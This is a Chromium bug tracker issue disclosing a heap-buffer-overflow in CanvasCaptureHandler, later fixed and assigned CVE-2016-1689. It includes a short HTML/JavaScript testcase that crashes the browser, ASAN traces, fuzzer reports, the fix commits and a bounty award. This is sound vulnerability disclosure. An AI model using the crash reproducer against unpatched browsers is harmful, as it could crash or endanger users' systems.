New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 606185: Heap-buffer-overflow in CopyAlphaChannelIntoVideoFrame

Reported by attek...@gmail.com, Apr 24 2016

Issue description

Tested on:

OS: Ubuntu 14.04

Chromium: asan-symbolized-linux-release-389396

Repro-file:

<html>
<head>
<script type='text/javascript'>
function boom() {
    var gl = canvas.getContext('experimental-webgl');
    video.srcObject = canvas.captureStream(0);
}
</script>
</head>
<body onload='boom();'>
    <video id='video' width='-602569' height='256'></video>
    <canvas id='canvas' width='256' height='257'></canvas>


ASAN-trace:

==10336==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ff04ad9bc03 at pc 0x55ea817465f3 bp 0x7ffc6bbab050 sp 0x7ffc6bbab048
READ of size 1 at 0x7ff04ad9bc03 thread T0 (chrome)
    #0 0x55ea817465f2 in (anonymous namespace)::CopyAlphaChannelIntoVideoFrame(unsigned char const*, scoped_refptr<media::VideoFrame> const&) /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:34
    #1 0x55ea81745667 in CreateNewFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:261 (discriminator 1)
    #2 0x55ea7c08722b in notifyListenersCanvasChanged /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/core/html/HTMLCanvasElement.cpp:421 (discriminator 1)
    #3 0x55ea7b0fd2ac in callInternal<0> /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:318 (discriminator 2)
    #4 0x55ea7b0fcffa in WTF::PartBoundFunctionImpl<(WTF::FunctionThreadAffinity)1, std::__1::tuple<blink::CrossThreadWeakPersistentThisPointer<blink::WebGLRenderingContextBase>&&>, WTF::FunctionWrapper<void (blink::WebGLRenderingContextBase::*)()>>::operator()() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:309
    #5 0x55ea85734684 in prepareMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/platform/graphics/gpu/DrawingBuffer.cpp:251 (discriminator 1)
    #6 0x55ea81cde959 in PrepareTextureMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/blink/web_external_texture_layer_impl.cc:74
    #7 0x55ea843893cc in Update /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/layers/texture_layer.cc:208
    #8 0x55ea8446412e in DoUpdateLayers /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/layer_tree_host.cc:1027 (discriminator 1)
    #9 0x55ea84463847 in cc::LayerTreeHost::UpdateLayers() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/layer_tree_host.cc:901 (discriminator 2)
    #10 0x55ea84539446 in BeginMainFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/proxy_main.cc:207 (discriminator 1)
.
.
.
0x7ff04ad9bc03 is located 3 bytes to the right of 263168-byte region [0x7ff04ad5b800,0x7ff04ad9bc00)
allocated by thread T0 (chrome) here:
    #0 0x55ea7571d48b in operator new(unsigned long) ??:?
    #1 0x55ea75bde912 in __allocate /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../buildtools/third_party/libc++/trunk/include/new:168
    #2 0x55ea75bde56b in __append /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../buildtools/third_party/libc++/trunk/include/vector:1039 (discriminator 4)
    #3 0x55ea8174526b in CreateNewFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:228
    #4 0x55ea7c08722b in notifyListenersCanvasChanged /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/core/html/HTMLCanvasElement.cpp:421 (discriminator 1)
    #5 0x55ea7b0fd2ac in callInternal<0> /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:318 (discriminator 2)
    #6 0x55ea7b0fcffa in WTF::PartBoundFunctionImpl<(WTF::FunctionThreadAffinity)1, std::__1::tuple<blink::CrossThreadWeakPersistentThisPointer<blink::WebGLRenderingContextBase>&&>, WTF::FunctionWrapper<void (blink::WebGLRenderingContextBase::*)()>>::operator()() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:309
    #7 0x55ea85734684 in prepareMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/platform/graphics/gpu/DrawingBuffer.cpp:251 (discriminator 1)
    #8 0x55ea81cde959 in PrepareTextureMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/blink/web_external_texture_layer_impl.cc:74
.
.
.
 
chrome-heap-buffer-overflow-CopyAlphaChannelIntoVideoFrame-min.html
328 bytes View Download

Comment 1 by ClusterFuzz, Apr 25 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Comment 2 by ClusterFuzz, Apr 25 2016

Project Member
Labels: Stability-Memory-AddressSanitizer Security_Impact-Beta
Status: Available (was: Unconfirmed)

Comment 3 by vakh@chromium.org, Apr 25 2016

Components: Blink>Canvas
Labels: Security_Severity-Medium
Owner: emir...@chromium.org

Comment 4 by vakh@chromium.org, Apr 25 2016

Labels: M-50

Comment 5 by ClusterFuzz, Apr 25 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Uploader: mbarbella@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-buffer-overflow READ 1
Crash Address: 0x7f2e7f0dbc03
Crash State:
  content::CanvasCaptureHandler::CreateNewFrame
  blink::HTMLCanvasElement::notifyListenersCanvasChanged
  blink::DrawingBuffer::prepareMailbox
  
Recommended Security Severity: Medium

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=383194:384397

Minimized Testcase (0.24 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94l7X-qyBPdRIuTKqUlDlH0kv8cP1Lq6QSLgAMPUtldHU8K1-9kMPh9OVsyiIGwOiiExwprye0aSKuJyA23SADAdO5fSA4EeFmLpzjTKWHJbYeCrV-IdXDPz9vRSBKyLIQElJGa_FD-gQHWR1RkMTI4PmJ3Qw
<script>
function boom() {
    var gl = canvas.getContext('experimental-webgl');
    video.srcObject = canvas.captureStream();
}
</script>
<body onload='boom();'<video id='video'></video>
    <canvas id='canvas' width='256' height='257'>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 6 by sheriffbot@chromium.org, Apr 25 2016

Project Member
Labels: -Security_Impact-Beta Security_Impact-Stable

Comment 7 by ClusterFuzz, Apr 25 2016

Project Member
Labels: Pri-1
Status: Assigned (was: Available)

Comment 8 by bugdroid1@chromium.org, Apr 26 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21

commit e0dd9f840b3a21cd12bd3d83f5ca63302549dd21
Author: emircan <emircan@chromium.org>
Date: Tue Apr 26 21:37:52 2016

Fix odd size and visible rect issues in CanvasCaptureHandler

This CL addresses odd size frame problems found by fuzz tests.

BUG= 606185 
TEST=Minimized fuzz test case now passes. Also added unit tests.

Review URL: https://codereview.chromium.org/1918073003

Cr-Commit-Position: refs/heads/master@{#389899}

[modify] https://crrev.com/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21/content/renderer/media/canvas_capture_handler.cc
[modify] https://crrev.com/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21/content/renderer/media/canvas_capture_handler_unittest.cc

Comment 9 by emir...@chromium.org, Apr 26 2016

Status: Fixed (was: Assigned)

Comment 10 by ClusterFuzz, Apr 27 2016

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage M-51 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 11 by ClusterFuzz, Apr 28 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 389884:390115.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Uploader: mbarbella@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-buffer-overflow READ 1
Crash Address: 0x7f2e7f0dbc03
Crash State:
  content::CanvasCaptureHandler::CreateNewFrame
  blink::HTMLCanvasElement::notifyListenersCanvasChanged
  blink::DrawingBuffer::prepareMailbox
  
Recommended Security Severity: Medium

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=383194:384397
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=389884:390115

Minimized Testcase (0.24 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94l7X-qyBPdRIuTKqUlDlH0kv8cP1Lq6QSLgAMPUtldHU8K1-9kMPh9OVsyiIGwOiiExwprye0aSKuJyA23SADAdO5fSA4EeFmLpzjTKWHJbYeCrV-IdXDPz9vRSBKyLIQElJGa_FD-gQHWR1RkMTI4PmJ3Qw
<script>
function boom() {
    var gl = canvas.getContext('experimental-webgl');
    video.srcObject = canvas.captureStream();
}
</script>
<body onload='boom();'<video id='video'></video>
    <canvas id='canvas' width='256' height='257'>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 12 by emir...@chromium.org, Apr 29 2016

Issue 608055 has been merged into this issue.

Comment 13 by timwillis@google.com, May 9 2016

Cc: timwillis@chromium.org
Labels: -Merge-Triage Merge-Request-51

Comment 14 by tin...@google.com, May 9 2016

Labels: -Merge-Request-51 Merge-Approved-51 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M51 (branch: 2704)

Comment 15 by bugdroid1@chromium.org, May 10 2016

Project Member
Labels: -merge-approved-51 merge-merged-2704
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/8618a80561b51f948a49998beaa0489d64da896e

commit 8618a80561b51f948a49998beaa0489d64da896e
Author: emircan <emircan@chromium.org>
Date: Tue May 10 17:19:26 2016

Fix odd size and visible rect issues in CanvasCaptureHandler

This CL addresses odd size frame problems found by fuzz tests.

BUG= 606185 
TEST=Minimized fuzz test case now passes. Also added unit tests.

Review URL: https://codereview.chromium.org/1918073003

Cr-Commit-Position: refs/heads/master@{#389899}
(cherry picked from commit e0dd9f840b3a21cd12bd3d83f5ca63302549dd21)

NOTRY=true
NOPRESUBMIT=true

Review-Url: https://codereview.chromium.org/1962993002
Cr-Commit-Position: refs/branch-heads/2704@{#476}
Cr-Branched-From: 6e53600def8f60d8c632fadc70d7c1939ccea347-refs/heads/master@{#386251}

[modify] https://crrev.com/8618a80561b51f948a49998beaa0489d64da896e/content/renderer/media/canvas_capture_handler.cc
[modify] https://crrev.com/8618a80561b51f948a49998beaa0489d64da896e/content/renderer/media/canvas_capture_handler_unittest.cc

Comment 16 by timwillis@google.com, May 24 2016

Labels: reward-topanel Release-0-M51

Comment 17 by timwillis@google.com, May 26 2016

Labels: -reward-topanel CVE-2016-1689 reward-unpaid reward-1000
Atte - $1,000 for this report. Congrats :)

CVE-ID is CVE-2016-1689.

Comment 18 by awhalley@chromium.org, Jul 1 2016

Labels: -reward-unpaid reward-inprocess

Comment 19 by sheriffbot@chromium.org, Aug 3 2016

Project Member
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 20 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 22 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 23 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment